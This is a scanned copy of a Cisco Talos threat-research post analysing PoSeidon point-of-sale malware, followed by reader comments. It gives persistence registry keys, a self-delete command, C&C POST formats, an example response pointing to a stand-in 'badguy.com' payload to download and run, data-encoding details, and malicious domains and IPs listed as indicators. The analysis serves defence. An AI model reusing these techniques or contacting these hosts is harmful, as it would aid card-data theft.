blogs.cisco.com
Open in
urlscan Pro
34.96.70.44
Public Scan
Submitted URL: http://blogs.cisco.com/security/talos/poseidon'
Effective URL: https://blogs.cisco.com/security/talos/poseidon
Submission: On November 21 via api from US — Scanned from US
Effective URL: https://blogs.cisco.com/security/talos/poseidon
Submission: On November 21 via api from US — Scanned from US
Form analysis
0 forms found in the DOMText Content
Skip to content Cisco Blogs / Security / Threat Spotlight: PoSeidon, A Deep Dive Into Point of Sale Malware March 20, 2015 17 Comments -------------------------------------------------------------------------------- SECURITY THREAT SPOTLIGHT: POSEIDON, A DEEP DIVE INTO POINT OF SALE MALWARE 6 min read Talos Group This post was authored by Andrea Allievi, Ben Baker, Nick Biasini, JJ Cummings, Douglas Goddard, William Largent, Angel Villegas, and Alain Zidouemba Cisco’s Security Solutions (CSS) consists of information security experts with a unique blend of law enforcement, enterprise security and technology security backgrounds. The team works directly with Cisco’s Talos Security Intelligence & Research Group to identify known and unknown threats, quantify and prioritize risk, and minimize future risk. When consumers make purchases from a retailer, the transaction is processed through Point-of-Sale (PoS) systems. When a credit or debit card is used, a PoS system is used to read the information stored on the magnetic stripe on the back of the credit card. Once this information gets stolen from a merchant, it can be encoded into a magnetic stripe and used with a new card. Criminal markets exist for this valuable information because the attackers are able to easily monetize stolen credit card data. Incidents involving PoS malware have been on the rise, affecting many large organizations as well as small mom-and-pop establishments and garnering a lot of media attention. The presence of large amounts of financial and personal information ensures that these companies and their retail PoS systems will remain attractive targets. OVERVIEW There is a new malware family targeting PoS systems, infecting machines to scrape memory for credit card information and exfiltrate that data to servers, also primarily .ru TLD, for harvesting and likely resale. This new malware family, that we’ve nicknamed PoSeidon, has a few components to it, as illustrated by the diagram below: At a high level, it starts with a Loader binary that upon being executed will first try to maintain persistence on the target machine in order to survive a possible system reboot. The Loader then contacts a command and control server, retrieving a URL which contains another binary to download and execute. The downloaded binary, FindStr, installs a keylogger and scans the memory of the PoS device for number sequences that could be credit card numbers. Upon verifying that the numbers are in fact credit card numbers, keystrokes and credit card numbers are encoded and sent to an exfiltration server. TECHNICAL DETAILS KEYLOGGER The file with SHA256 334079dc9fa5b06fbd68e81de903fcd4e356b4f2d0e8bbd6bdca7891786c39d4 could perhaps be at the source of the PoS system compromise. We call this file KeyLogger based on debugging information found in the binary: Upon execution, this file copies itself to either %SystemRoot%\system32\<filename>.exe or %UserProfile%\<filename>.exe and adds registry entry under HKLM (or HKCU)\Software\Microsoft\Windows\CurrentVersion\Run. The file also opens HKCU\Software\LogMeIn Ignition and enumerates the keys for the account sub key, opens it and deletes the PasswordTicket Value and obtains the Email Value. Also deletes registry tree HKCU\Software\LogMeIn Ignition\<key>\Profiles\* . The file sends to an exfiltration server by POSTing data to one of these URIs: * wondertechmy[.]com/pes/viewtopic.php * wondertechmy[.]ru/pes/viewtopic.php * wondwondnew[.]ru/pes/viewtopic.php The URI format is uid=%I64u&win=%d.%d&vers=%s The Keylogger component was potentially used to steal passwords and could have been the initial infection vector. LOADER The loader for the PoSeidon PoS malware gets its name from debugging information found in the binary: Upon being run, Loader checks to see if it’s being executed with one of these two file names: * WinHost.exe * WinHost32.exe If it is not, it will make sure that no Windows service is running with the name WinHost. Loader will copy itself to %SystemRoot%\System32\WinHost.exe, overwriting any file in that location that would happen to have the same name. Next, Loader will start a service named WinHost. This is done so that it remains running in memory even if the current user logs off. If Loader is not able to install itself as a service, it will try to find other instances of itself running in memory and terminate them. Subsequently, it will copy itself to %UserProfile%\WinHost32.exe and install the registry key HKCU\Microsoft\Windows\CurrentVersion\Run\\WinHost32. Finally, it will create a new process to execute %UserProfile%\WinHost32.exe. Now that persistence has been achieved, Loader will delete itself by running the following command: * cmd.exe /c del <path_to_itself> >> NUL The instance of Loader running in memory attempt to read configuration data at %SystemRoot%\System32\WinHost.exe.cfg. This file can hold a list of URLs to be added to a list of hardcoded URLs already contained in Loader. Loader then attempts to contact one of the hardcoded C&C server: * linturefa.com * xablopefgr.com * tabidzuwek.com * lacdileftre.ru * tabidzuwek.com * xablopefgr.com * lacdileftre.ru * weksrubaz.ru * linturefa.ru * mifastubiv.ru * xablopefgr.ru * tabidzuwek.ru Associated IP Addresses: * 151.236.11.167 * 185.13.32.132 * 185.13.32.48 * REDACTED at request of Federal Law Enforcement * 31.184.192.196 * 91.220.131.116 * 91.220.131.87 If one of the domains above resolve to an IP address an HTTP POST is made using the following user-agent string: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) POST data is sent to either: * <IP ADDRESS>/ldl01/viewtopic.php * <IP ADDRESS>/pes2/viewtopic.php POST data follows the format: uid=%I64u&uinfo=%s&win=%d.%d&bits=%d&vers=%s&build=%s Loader expects the following response from the C&C server: {<CommandLetter>:<ArgumentString>} Example response: * {R:http://badguy.com/malwarefilename.exe} * {b:pes13n|373973303|https://01.220.131.116/ldl01/files/pes13n.exe} It’s by fetching and executing the executable referenced in the server response that the second part of PoSeidon finds its way to the PoS device. FINDSTR The loader for the PoSeidon PoS malware gets its name from debugging information found in the binary: An embedded PE is extracted through shellcode and execution continues with the embedded binary. This file installs a minimal keylogger that is implemented similarly to the description found here. The data intercepted by this keylogger will later be sent to an exfiltration server. The PE then cycles through all running processes on the PoS device to look for processes with a security token not associated with the “NT AUTHORITY” domain name. It iterates through all read/write pages within those processes for credit card info. The malware only looks for number sequences that start with: * 6, 5, 4 with a length of 16 digits (Discover, Visa, Mastercard) * 3 with a length of 15 digits (AMEX) It then uses the Luhn algorithm to verify that the numbers are actually credit or debit card numbers as shown by the code segment below: Next, DNS resolution is attempted for the domains below. These are some of the known data exfiltration servers: * quartlet.com * horticartf.com * kilaxuntf.ru * dreplicag.ru * fimzusoln.ru * wetguqan.ru If one of the domains above resolve to an IP address an HTTP POST is made using the following user-agent string: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) POST data is sent to: <IP ADDRESS>/pes13/viewtopic.php Data follows the following format: oprat=2&uid=%I64u&uinfo=%s&win=%d.%d&vers=%s optional POST data (data: credit card numbers, logs: keylogger data) &data=<XORed_with_0x2A_then_base64_data_unk> &logs=<XORed_with_0x2A_then_base64_data_unk> Credit card numbers and keylogger data is sent to the exfiltration server after being XORed and base64 encoded. The expect response from the exfiltration server is: This mechanism allows for the the malware to update itself, based on commands received from the exfiltration server. LOADER VS FINDSTR Comparing an unpacked copy of Loader version 11.4 to an unpacked copy of FindStr version 7.1 with Bindiff shows that 62% of the functionality in both samples is the same. The actors behind this malware probably developed some core functionality and compiled it into a library to be used by other projects they are developing. IOC Click for Endpoint IOC Version Win.Trojan.PoSeidon.RegistryItem.ioc Win.Trojan.PoSeidon.ProcessItem.ioc Win.Trojan.PoSeidon.FileItem.ioc Domains * linturefa.com * xablopefgr.com * tabidzuwek.com * linturefa.ru * xablopefgr.ru * tabidzuwek.ru * weksrubaz.ru * mifastubiv.ru * lacdileftre.ru * quartlet.com * horticartf.com * kilaxuntf.ru * dreplicag.ru * fimzusoln.ru * wetguqan.ru IP Addresses: * 151.236.11.167 * 185.13.32.132 * 185.13.32.48 * REDACTED at request of Federal Law Enforcement * 31.184.192.196 * 91.220.131.116 * 91.220.131.87 * REDACTED at request of Federal Law Enforcement Conclusion PoSeidon is another in the growing number of Point-of-Sale malware targeting PoS systems that demonstrate the sophisticated techniques and approaches of malware authors. Attackers will continue to target PoS systems and employ various obfuscation techniques in an attempt to avoid detection. As long as PoS attacks continue to provide returns, attackers will continue to invest in innovation and development of new malware families. Network administrators will need to remain vigilant and adhere to industry best practices to ensure coverage and protection against advancing malware threats. Snort Rules: 33836-33852. Please refer to Defense Center or FIREsight management console for updated information. Protecting Users from These Threats We encourage organizations to consider security best practices, starting with a threat-centric approach. Given the dynamic threat landscape, we advocate this threat-centric and operationalized approach that implements protections across the extended network – and across the full attack continuum – before, during, and after an attack. This approach is predicated upon superior visibility, continuous control, and advanced threat protection across the extended network and the entire attack continuum Share Share: AUTHORS TALOS GROUP TALOS SECURITY INTELLIGENCE & RESEARCH GROUP -------------------------------------------------------------------------------- 17 COMMENTS * John Doe says: March 21, 2015 at 4:35 pm “REDACTED at request of Federal Law Enforcement” What’s that? * Michael Kirkpatrick says: March 23, 2015 at 1:58 am There is probobly an on going investigation being conducted by law enforcment agencies. They don’t want that IP or domain name revealed in case it impacts on their investigation. * Anonymous says: March 23, 2015 at 10:38 am That is beyond stupid. When malware authors read this article, they will know what IPs have been [redacted] and not listed in the report and just null those IPs out and start using new ones… * Urban C}{aos says: March 24, 2015 at 6:09 am This isn’t just for the Malware authors but also for the general snoopy people on the Internet. Botnet C2C traffic may get adulterated by thousands more connections thereby hindering investigations. * eduard tovt says: May 11, 2015 at 1:51 am non rekvalite sitems uniti problems v doskonalenie sistemi kattorie bolhe net na simle besapasnastie nasagelaveka na sypytnika skanivanie is kosmasa nasa ani twklycat orussie kalignie rakety simy ynigtassenie nacii gelaweka na 2018 v okeani pretupas ressdenie was kto iuslessit ifarmaciua amerika prinala resultat unitassenia nacii myslman katowi a rakety masowi parassenie evropi ungtahenie myssicow na simle bydte bititelnie reformcii * Nick Kelly says: March 23, 2015 at 9:09 am The file path is definitely windows. Do we know if this malware can remain persistent on an embedded XP system or just a full Windows install? Thx * JJ Cummings says: March 23, 2015 at 9:33 am We have seen this malware establish persistence on both embedded Windows XP and Windows 7 systems. * jlindema says: March 24, 2015 at 2:07 pm It will be nice when… the information scraped from the POS terminals is either no longer valid, and/or can only be used by the first merchant to ‘claim’ the card number (and not be used over and over again). Tokenization is the key. Final -a startup located in Mtn. View, CA is working on this. Check out: getfinal (dot) com. * Joel says: March 24, 2015 at 2:14 pm I think Apple has already figured this out with Apple Pay.. * Apple Hater says: March 24, 2015 at 2:20 pm You mean google wallet? * Mildar says: March 25, 2015 at 1:14 am How does these PoS systems get infected? It is uncommon to search web pages or receive emails on Pay terminals. So USB? (not very effective?) or not updated system -> exploit? * Marpos says: March 26, 2015 at 6:35 pm Mildar is on point. How is this malware propagating? What’s the attack vector. * TD says: April 4, 2015 at 3:00 am Likely USB or the like, you’d be surprised how effective localized infection vectors can be. Ask Target. * NL says: April 10, 2015 at 3:32 pm Can you please provide MD5 Hash for IOC’s above? * Douglas Held says: April 11, 2015 at 7:08 am Authors, thank you for this well written information. I’m really interested to know whether the Loader service stays resident once the attack is underway? In that case, I think the simplest way to detect an infected system would be to che for the registered device name ‘WinHost(32)?’… Correct? Thanks * Douglas Held says: April 11, 2015 at 10:51 am Correction; service name “WinHost”…. * Bradley Cyprus says: April 15, 2015 at 9:09 am To answer the question about how stations get infected. Many POS malware infections start with insecure remote access. For example, over the past 12 months, LogMeIn was used insecurely by several POS companies. An account was breached, and the hacker was able to access 100’s of POS stations in an unattended mode. There are ways to use these tools correctly, but many do not. For more data about this, look at the Department of Homeland Security brief: http://www.us-cert.gov/sites/default/files/publications/BackoffPointOfSaleMalware.pdf Comments are closed. CISCO CYBERSECURITY VIEWPOINTS Where security insights and innovation meet. Read the e-book, see the video, dive into the infographic and more... Get expert perspectives now WHY CISCO SECURITY? Explore our Products & Services Learn More CONNECT WITH US * * * * * By continuing to use our website, you acknowledge the use of cookies. Privacy Statement Change Settings CONSENT MANAGER Your Opt Out Preference Signal is Honored * YOUR PRIVACY * STRICTLY NECESSARY COOKIES * PERFORMANCE COOKIES * TARGETING COOKIES * FUNCTIONAL COOKIES YOUR PRIVACY When you visit any website, it may store or retrieve information on your browser, mostly in the form of cookies. This information might be about you, your preferences or your device and is mostly used to make the site work as you expect it to. The information does not usually directly identify you, but it can give you a more personalized web experience. Because we respect your right to privacy, you can choose not to allow some types of cookies. From the list on left, please choose whether this site may use Performance and/or Targeting Cookies. By selecting Strictly Necessary Cookies only, you are requesting Cisco not to sell or share your personal data. Note, blocking some types of cookies may impact your experience on the site and the services we are able to offer. STRICTLY NECESSARY COOKIES Always Active These cookies are necessary for the website to function and cannot be switched off in our systems. They are usually only set in response to actions made by you which amount to a request for services, such as setting your privacy preferences, logging in or filling in forms. You can set your browser to block or alert you about these cookies, but some parts of the site will not then work. These cookies do not store any personally identifiable information. VENDOR LIST ONETRUST Always Active PARENT COMPANY ONETRUST DEFAULT DESCRIPTION ONETRUST LLC (ONETRUST) IS A PROVIDER OF PRIVACY MANAGEMENT SOFTWARE PLATFORM. THE COMPANY'S PLATFORM SUPPORTS ORGANIZATIONS TO ADHERE COMPLIANCE WITH THE DATA PRIVACY, GOVERNANCE AND SECURITY REGULATIONS ACROSS SECTORS AND JURISDICTIONS. PERFORMANCE COOKIES Performance Cookies These cookies provide metrics related to the performance and usability of our site. They are primarily focused on gathering information about how you interact with our site, including: page load times, response times, error messages, and allowing a replay of a visitor’s interactions with our site, which enables us to review and analyze visitor behavior, helping to improve site usability and functionality. These cookies also allow us to count visits and traffic sources so we can measure and improve the performance of our site. They help us to know which pages are the most and least popular and see how visitors move around the site. If you do not allow these cookies we will not know when you have visited our site and will not be able to monitor its performance. VENDOR LIST MARKETO PARENT COMPANY ADOBE DEFAULT DESCRIPTION MARKETO DEVELOPS AND SELLS MARKETING AUTOMATION SOFTWARE FOR ACCOUNT-BASED MARKETING AND OTHER MARKETING SERVICES AND PRODUCTS INCLUDING SEO AND CONTENT CREATION. FULLSTORY PARENT COMPANY FULLSTORY, INC. DEFAULT DESCRIPTION FULLSTORY TELLS CUSTOMERS EVERYTHING THEY NEED TO KNOW ABOUT THEIR USERS DIGITAL EXPERIENCE. CLOUDFLARE PARENT COMPANY CLOUDFLARE INC. DEFAULT DESCRIPTION CLOUDFLARE’S GLOBAL CLOUD PLATFORM DELIVERS A RANGE OF NETWORK SERVICES TO BUSINESSES OF ALL SIZES AROUND THE WORLD—MAKING THEM MORE SECURE WHILE ENHANCING THE PERFORMANCE AND RELIABILITY OF THEIR CRITICAL INTERNET PROPERTIES. TWITTER PARENT COMPANY TWITTER INC. DEFAULT DESCRIPTION TWITTER IS AN AMERICAN MICROBLOGGING AND SOCIAL NETWORKING SERVICE ON WHICH USERS POST AND INTERACT WITH MESSAGES KNOWN AS "TWEETS". REGISTERED USERS CAN POST, LIKE, AND RETWEET TWEETS, BUT UNREGISTERED USERS CAN ONLY READ THOSE THAT ARE PUBLICLY AVAILABLE. YAHOO TRACKER PARENT COMPANY APOLLO GLOBAL MANAGEMENT, INC. DEFAULT DESCRIPTION YAHOO OPERATES AN ONLINE WEB PORTAL INTENDED TO PROVIDE THE LATEST NEWS ON FINANCE, LIFESTYLE, MOVIES, CELEBRITY, TRAVEL, AND MORE. ADOBE AUDIENCE MANAGER PARENT COMPANY ADOBE DEFAULT DESCRIPTION ADOBE AUDIENCE MANAGER IS ADOBE'S BEST-IN-CLASS DATA MANAGEMENT PLATFORM. AMPLITUDE PARENT COMPANY AMPLITUDE, INC. DEFAULT DESCRIPTION AMPLITUDE IS THE PIONEER IN DIGITAL OPTIMIZATION SOFTWARE. CONTENTSQUARE PARENT COMPANY CONTENTSQUARE GOOGLE ANALYTICS PARENT COMPANY GOOGLE DEFAULT DESCRIPTION GOOGLE ANALYTICS IS A WEB ANALYTICS SERVICE OFFERED BY GOOGLE THAT TRACKS AND REPORTS WEBSITE TRAFFIC, CURRENTLY AS A PLATFORM INSIDE THE GOOGLE MARKETING PLATFORM BRAND. MPULSE PARENT COMPANY AKAMAI TECHNOLOGIES, INC. DEFAULT DESCRIPTION AKAMAI MPULSE IS A REAL USER MONITORING (RUM) SOLUTION THAT ENABLES DEVELOPERS, ADMINS, AND PERFORMANCE ENGINEERS TO EASILY SEE WEBSITE PERFORMANCE PROBLEMS AND DISCOVER OPTIMIZATION OPPORTUNITIES. KRUX PARENT COMPANY SALESFORCE.COM, INC. DEFAULT DESCRIPTION SALESFORCE DMP, FORMERLY KRUX, STRENGTHENS CONSUMER RELATIONSHIPS ACROSS ALL TOUCHPOINTS WITH ITS POWERFUL DATA MANAGEMENT PLATFORM. YAHOO PARENT COMPANY APOLLO GLOBAL MANAGEMENT, INC. DEFAULT DESCRIPTION YAHOO OPERATES AN ONLINE WEB PORTAL INTENDED TO PROVIDE THE LATEST NEWS ON FINANCE, LIFESTYLE, MOVIES, CELEBRITY, TRAVEL, AND MORE. BIZIBLE PARENT COMPANY MARKETO/ADOBE DEFAULT DESCRIPTION BIZIBLE UNIFIES BEHAVIORAL AND AD DATA WITH SALES OUTCOMES AND MACHINE LEARNING, HELPING CUSTOMERS MAKE THE RIGHT MARKETING DECISIONS. BLUEKAI PARENT COMPANY ORACLE DEFAULT DESCRIPTION ORACLE BLUEKAI DATA MANAGEMENT PLATFORM, FORMERLY BLUEKAI, IS A CLOUD-BASED DATA MANAGEMENT PLATFORM THAT ENABLES COMPANIES TO PERSONALIZE ONLINE, OFFLINE, AND MOBILE MARKETING CAMPAIGNS. QUALTRICS PARENT COMPANY QUALTRICS DEFAULT DESCRIPTION QUALTRICS, CREATOR OF THE CUSTOMER EXPERIENCE MANAGEMENT (XM) CATEGORY, OFFERS A SYSTEM OF ACTION THAT HELPS BUSINESSES ATTRACT CUSTOMERS WHO STAY LONGER AND BUY MORE, ENGAGE EMPLOYEES WHO BUILD A POSITIVE CULTURE, DEVELOP BREAKTHROUGH PRODUCTS PEOPLE LOVE AND BUILD A BRAND PEOPLE ARE PASSIONATE ABOUT. TARGETING COOKIES Targeting Cookies These cookies may be set through our site by our advertising partners. They may be used by those companies to build a profile of your interests and show you relevant adverts on other sites. They do not store directly personal information, but are based on uniquely identifying your browser and internet device. If you do not allow these cookies, you will experience less targeted advertising. VENDOR LIST PUBMATIC PARENT COMPANY PUBMATIC, INC. DEFAULT DESCRIPTION PUBMATIC’S SELL-SIDE PLATFORM EMPOWERS THE WORLD’S LEADING DIGITAL CONTENT CREATORS ACROSS THE OPEN INTERNET TO CONTROL ACCESS TO THEIR INVENTORY AND INCREASE MONETIZATION BY ENABLING MARKETERS TO DRIVE RETURN ON INVESTMENT AND REACH ADDRESSABLE AUDIENCES ACROSS AD FORMATS AND DEVICES. ADFORM PARENT COMPANY ADFORM DEFAULT DESCRIPTION ADFORM IS A GLOBAL, INDEPENDENT AND FULLY INTEGRATED ADVERTISING PLATFORM BUILT FOR MODERN MARKETING. GOOGLE ADSENSE PARENT COMPANY GOOGLE DEFAULT DESCRIPTION GOOGLE ADSENSE IS A PROGRAM RUN BY GOOGLE THROUGH WHICH WEBSITE PUBLISHERS IN THE GOOGLE NETWORK OF CONTENT SITES SERVE TEXT, IMAGES, VIDEO, OR INTERACTIVE MEDIA ADVERTISEMENTS THAT ARE TARGETED TO THE SITE CONTENT AND AUDIENCE. FACEBOOK PARENT COMPANY META PLATFORMS, INC. DEFAULT DESCRIPTION FACEBOOK IS AN ONLINE SOCIAL MEDIA AND SOCIAL NETWORKING SERVICE OWNED BY META PLATFORMS. HUBSPOT PARENT COMPANY HUBSPOT, INC. DEFAULT DESCRIPTION HUBSPOT IS A LEADING CRM PLATFORM THAT PROVIDES SOFTWARE AND SUPPORT TO HELP COMPANIES GROW BETTER. THE PLATFORM INCLUDES MARKETING, SALES, SERVICE, OPERATIONS, AND WEBSITE MANAGEMENT PRODUCTS THAT START FREE AND SCALE TO MEET OUR CUSTOMERS' NEEDS AT ANY STAGE OF GROWTH. DOUBLECLICK PARENT COMPANY GOOGLE DEFAULT DESCRIPTION DOUBLECLICK DIGITAL MARKETING (DDM) IS AN INTEGRATED AD TECHNOLOGY PLATFORM OWNED BY GOOGLE THAT ENABLES ADVERTISERS TO CREATE AND MANAGE DIGITAL MARKETING CAMPAIGNS. MICROSOFT BING ADVERTISING PARENT COMPANY MICROSOFT DEFAULT DESCRIPTION MICROSOFT IS A SOFTWARE CORPORATION THAT DEVELOPS, MANUFACTURES, LICENSES, SUPPORTS, AND SELLS A RANGE OF SOFTWARE PRODUCTS AND SERVICES. LINKEDIN ADS PARENT COMPANY MICROSOFT DEFAULT DESCRIPTION LINKEDIN IS AN AMERICAN BUSINESS AND EMPLOYMENT-ORIENTED ONLINE SERVICE THAT OPERATES VIA WEBSITES AND MOBILE APPS. TABOOLA PARENT COMPANY TABOOLA DEFAULT DESCRIPTION TABOOLA IS THE WORLD'S LEADING DISCOVERY AND NATIVE ADVERTISING PLATFORM THAT HELPS PEOPLE EXPLORE WHAT'S INTERESTING AND NEW IN THE MOMENT OF NEXT. RUBICON PROJECT PARENT COMPANY MAGNITE INC. DEFAULT DESCRIPTION RUBICON PROJECT WAS A TECHNOLOGY COMPANY THAT PIONEERED THE AUTOMATION OF DIGITAL ADVERTISING. IN 2020, THE COMPANY MERGED WITH CONNECTED TV LEADER TELARIA AND BECAME MAGNITE. AMAZON ASSOCIATES PARENT COMPANY AMAZON DEFAULT DESCRIPTION THE AMAZON AFFILIATE PROGRAM, OR AMAZON ASSOCIATES, IS AN AFFILIATE MARKETING PROGRAM. THE TRADE DESK PARENT COMPANY THE TRADE DESK DEFAULT DESCRIPTION THE TRADE DESK IS A TECHNOLOGY COMPANY THAT EMPOWERS BUYERS OF ADVERTISING. THROUGH ITS SELF-SERVICE, CLOUD-BASED PLATFORM, AD BUYERS CAN CREATE, MANAGE, AND OPTIMIZE MORE EXPRESSIVE DATA-DRIVEN DIGITAL ADVERTISING CAMPAIGNS ACROSS AD FORMATS, INCLUDING DISPLAY, VIDEO, AUDIO, NATIVE AND SOCIAL, ON A MULTITUDE OF DEVICES, INCLUDING COMPUTERS, MOBILE DEVICES, AND CONNECTED TV. APPNEXUS PARENT COMPANY XANDR INC. (AT&T) DEFAULT DESCRIPTION A BUSINESS UNIT WITHIN AT&T, XANDR POWERS A GLOBAL MARKETPLACE FOR PREMIUM ADVERTISING. SHARETHROUGH PARENT COMPANY SHARETHROUGH DEFAULT DESCRIPTION SHARETHROUGH IS ONE OF THE TOP GLOBAL INDEPENDENT OMNICHANNEL AD EXCHANGES. MEDIAMATH PARENT COMPANY MEDIAMATH DEFAULT DESCRIPTION MEDIAMATH IS AN INDEPENDENT ADVERTISING TECHNOLOGY COMPANY FOR BRANDS AND AGENCIES. SIZMEK PARENT COMPANY AMAZON DEFAULT DESCRIPTION SIZMEK AD SUITE GIVES CUSTOMERS CREATIVE CONTROL TO ENGAGE AUDIENCES WITH RELEVANT, IMPACTFUL ADS WHILE CENTRALIZING CROSS-CHANNEL INSIGHTS TO AID IN CAMPAIGN OPTIMIZATION. FUNCTIONAL COOKIES Functional Cookies These cookies enable the website to provide enhanced functionality and personalisation. They may be set by us or by third party providers whose services we have added to our pages. If you do not allow these cookies then some or all of these services may not function properly. VENDOR LIST WHOIS PRIVACY SERVICE PARENT COMPANY CENTRALNIC DEFAULT DESCRIPTION THE WHOIS PRIVACY PROTECTION SERVICE KEEPS YOUR CONTACT INFORMATION PRIVATE FOR A DOMAIN. GOOGLE PARENT COMPANY GOOGLE DEFAULT DESCRIPTION FOR APPS OR SITES, USER-GENERATED CONTENT IS CONTENT THAT USERS CONTRIBUTE TOWARD ANY APP OR SITE, VISIBLE TO AT LEAST A SUBSET OF OTHER USERS. USER-GENERATED CONTENT CAN INCLUDE TEXT, COMMENTS, IMAGES, VIDEO, PROFILES, USERNAMES, VOTES, LIKES, HEARTS, OR OTHER MEDIA, FOR EXAMPLE. FONT AWESOME PARENT COMPANY FONT AWESOME DEFAULT DESCRIPTION FONT AWESOME IS A FONT AND ICON TOOLKIT BASED ON CSS AND LESS. CISCO SYSTEMS PARENT COMPANY CISCO SYSTEMS, INC. DEFAULT DESCRIPTION CISCO'S HARDWARE, SOFTWARE, AND SERVICE OFFERINGS ARE USED TO CREATE THE INTERNET SOLUTIONS THAT MAKE NETWORKS POSSIBLE. GITHUB PARENT COMPANY GITHUB, INC. DEFAULT DESCRIPTION GITHUB, INC. IS A PROVIDER OF INTERNET HOSTING FOR SOFTWARE DEVELOPMENT AND VERSION CONTROL USING GIT. IT OFFERS THE DISTRIBUTED VERSION CONTROL AND SOURCE CODE MANAGEMENT FUNCTIONALITY OF GIT, PLUS ITS OWN FEATURES. WISTIA PARENT COMPANY WISTIA, INC. DEFAULT DESCRIPTION WISTIA IS A COMPLETE VIDEO HOSTING PLATFORM FOR BETTER MARKETING. STRIPE PARENT COMPANY STRIPE INC. DEFAULT DESCRIPTION STRIPE OPERATES PAYMENT PROCESSING SOFTWARE FOR E-COMMERCE WEBSITES. UNPKG PARENT COMPANY CLOUDFLARE INC. DEFAULT DESCRIPTION UNPKG IS A FAST, GLOBAL CONTENT DELIVERY NETWORK FOR EVERYTHING ON NPM. USE IT TO QUICKLY AND EASILY LOAD ANY FILE FROM ANY PACKAGE USING A URL. FORCE BY SALESFORCE PARENT COMPANY SALESFORCE.COM, INC. DEFAULT DESCRIPTION SALESFORCE UNITES CUSTOMERS' MARKETING, SALES, COMMERCE, SERVICE, AND IT TEAMS FROM ANYWHERE WITH CUSTOMER 360 — ONE INTEGRATED CRM PLATFORM THAT POWERS OUR ENTIRE SUITE OF CONNECTED APPS. BOOTSTRAPCDN PARENT COMPANY JSDELIVR DEFAULT DESCRIPTION BOOTSTRAPCDN IS A PUBLIC CONTENT DELIVERY NETWORK. ZIFT SOLUTIONS PARENT COMPANY ZIFT SOLUTIONS DEFAULT DESCRIPTION ZIFT SOLUTIONS INCREASES CHANNEL SALES AND BOOSTS MARKETING IMPACT BY DELIVERING A SUPERIOR TECHNOLOGY PLATFORM, STRATEGIC INSIGHT AND GLOBAL CHANNEL SUPPORT. RECAPTCHA PARENT COMPANY GOOGLE DEFAULT DESCRIPTION RECAPTCHA USES AN ADVANCED RISK ANALYSIS ENGINE AND ADAPTIVE CHALLENGES TO KEEP MALICIOUS SOFTWARE FROM ENGAGING IN ABUSIVE ACTIVITIES ON YOUR WEBSITE. BRIGHTCOVE PARENT COMPANY BRIGHTCOVE, INC. DEFAULT DESCRIPTION BRIGHTCOVE OFFERS A ROBUST VIDEO PLATFORM THAT ALLOWS INDIVIDUALS AND BUSINESSES TO SHARE, STREAM AND HOST. TEALIUM PARENT COMPANY TEALIUM INC. DEFAULT DESCRIPTION TEALIUM SELLS ENTERPRISE TAG MANAGEMENT, AN API HUB, A CUSTOMER DATA PLATFORM WITH MACHINE LEARNING, AND DATA MANAGEMENT PRODUCTS, ALLOWING THEIR CUSTOMERS TO CONNECT THEIR DATA SO THEY CAN CONNECT WITH CUSTOMERS. GSTATIC PARENT COMPANY GOOGLE DEFAULT DESCRIPTION GSTATIC.COM IS A WEB DOMAIN OWNED AND USED BY GOOGLE FOR ACCESSING THE GSTATIC SERVER: A SERVER WHERE GOOGLE HOSTS ITS STATIC CONTENT LIKE CSS, IMAGES OR JAVASCRIPT. IGODIGITAL PARENT COMPANY SALESFORCE.COM, INC. DEFAULT DESCRIPTION SALESFORCE UNITES CUSTOMERS' MARKETING, SALES, COMMERCE, SERVICE, AND IT TEAMS FROM ANYWHERE WITH CUSTOMER 360 — ONE INTEGRATED CRM PLATFORM THAT POWERS OUR ENTIRE SUITE OF CONNECTED APPS. JSDELIVR PARENT COMPANY PROSPECT ONE DEFAULT DESCRIPTION JSDELIVR IS A PUBLIC, OPEN-SOURCE CDN (CONTENT DELIVERY NETWORK) FOCUSED ON PERFORMANCE, RELIABILITY, AND SECURITY. IT IS FREE TO USE FOR EVERYONE, WITH NO BANDWIDTH LIMITS. GOOGLE TAG MANAGER PARENT COMPANY GOOGLE DEFAULT DESCRIPTION GOOGLE TAG MANAGER IS A TAG MANAGEMENT SYSTEM (TMS) THAT ALLOWS YOU TO QUICKLY AND EASILY UPDATE MEASUREMENT CODES AND RELATED CODE FRAGMENTS COLLECTIVELY KNOWN AS TAGS ON YOUR WEBSITE OR MOBILE APP. ONCE THE SMALL SEGMENT OF TAG MANAGER CODE HAS BEEN ADDED TO YOUR PROJECT, YOU CAN SAFELY AND EASILY DEPLOY ANALYTICS AND MEASUREMENT TAG CONFIGURATIONS FROM A WEB-BASED USER INTERFACE. APPDYNAMICS PARENT COMPANY CISCO DEFAULT DESCRIPTION CISCO APPDYNAMICS DELIVERS FULL-STACK OBSERVABILITY THAT ALLOWS CUSTOMERS TO SEE, UNDERSTAND, AND OPTIMIZE WHAT HAPPENS INSIDE AND BEYOND THEIR ARCHITECTURE. ADOBE DYNAMIC TAG MANAGER PARENT COMPANY ADOBE DEFAULT DESCRIPTION ADOBE DYNAMIC TAG MANAGEMENT (DTM) LETS MARKETERS QUICKLY AND EASILY MANAGE TAGS AND PROVIDES INNOVATIVE TOOLS FOR COLLECTING AND DISTRIBUTING DATA ACROSS DIGITAL MARKETING SYSTEMS. GOOGLE APIS PARENT COMPANY GOOGLE DEFAULT DESCRIPTION GOOGLE APIS ARE APPLICATION PROGRAMMING INTERFACES DEVELOPED BY GOOGLE WHICH ALLOW COMMUNICATION WITH GOOGLE SERVICES AND THEIR INTEGRATION TO OTHER SERVICES. EXAMPLES OF THESE INCLUDE SEARCH, GMAIL, TRANSLATE OR GOOGLE MAPS. DEMANDWARE PARENT COMPANY SALESFORCE.COM, INC. DEFAULT DESCRIPTION THE SALESFORCE COMMERCE CLOUD, FORMERLY DEMANDWARE, POWERS ENTERPRISE CLOUD COMMERCE FOR THE WORLD'S MOST INNOVATIVE BRANDS, ENABLING UNIFIED, 1-TO-1 EXPERIENCES ACROSS ALL POINTS OF COMMERCE INCLUDING WEB, MOBILE, SOCIAL AND STORE. Back Button COOKIE LIST Filter Button Consent Leg.Interest Switch Label label Switch Label label Switch Label label Clear checkbox label label Apply Cancel Save Settings Allow All